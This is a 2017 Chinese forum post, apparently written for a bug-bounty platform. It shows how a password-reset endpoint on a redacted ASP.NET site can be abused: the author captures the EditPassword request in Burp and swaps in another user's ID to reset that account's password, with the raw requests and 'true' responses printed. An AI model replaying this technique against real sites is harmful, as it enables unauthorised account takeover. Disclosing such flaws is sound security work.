本帖最后由 小爱_Joker 于 2017-5-27 01:43 编辑
挖掘逻辑漏洞 基本都是前端问题 过滤不严格 导致 熬夜挖漏洞盒子厂商!!
身为一个正在学习挖掘逻辑漏洞的小彩笔来说 首先是找二级 或者三 四级域名 大厂商的话主站 是别想了 当然 很少有主站存在很多漏洞的厂商
挖掘逻辑漏洞 先注册个账户
QQ截图20170527035429.png (429.39 KB, 下载次数: 47)
2017-5-27 03:55 上传
注册完成后 找回密码
找回密码的这里他会提示你验证码不对
邮箱收到的验证码是四位数 懒得爆破了
QQ截图20170527040550.png (27.01 KB, 下载次数: 48)
2017-5-27 04:05 上传
直接进入主题
前端有个验证 这个管理员做的很不错
换种思路
输入正确的验证码 burp抓包
QQ截图20170527040738.png (60.99 KB, 下载次数: 59)
2017-5-27 04:08 上传
go一下
QQ截图20170527040909.png (60.01 KB, 下载次数: 50)
2017-5-27 04:09 上传
发现返回包回显了true
数据包
[AppleScript] 纯文本查看 复制代码POST /WebShow/EditPassword HTTP/1.1
Host: xxxxxxxxx
Content-Length: 36
Accept: */*
Origin: http://xxxx
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://xxxx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASP.NET_SessionId=j05uko4ktviennntuk515ka1
Connection: close
userId=xxx1588x@qq.com&psd=xxxxxx@
返回包
[AppleScript] 纯文本查看 复制代码HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 4.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Fri, 26 May 2017 20:01:37 GMT
Connection: close
Content-Length: 4
true
这个时候我又去注册了个用户 因为没有注册限制 前端缺陷 也不用验证码
注册一个用户为[email]888888888888@qq.com[/email] 密码为test888
QQ截图20170527041205.png (199.64 KB, 下载次数: 39)
2017-5-27 04:12 上传
注册成功后
返回burp
发包
修改密码为123456test
[AppleScript] 纯文本查看 复制代码POST /WebShow/EditPassword HTTP/1.1
Host: xxxxx
Content-Length: 42
Accept: */*
Origin: [url]http://xxxxxx[/url]
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: [url]http://xxxx/[/url]
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASP.NET_SessionId=j05uko4ktviennntuk515ka1
Connection: close
userId=888888888888@qq.com &psd=123456test
返回包
[AppleScript] 纯文本查看 复制代码HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 4.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Fri, 26 May 2017 20:12:32 GMT
Connection: close
Content-Length: 4
true
这么来说吧 true 是真正的意思 也就是操作成功的意思
登录验证
QQ截图20170527041439.png (22.72 KB, 下载次数: 44)
2017-5-27 04:14 上传
- - !思路仅供学习 大佬们勿喷。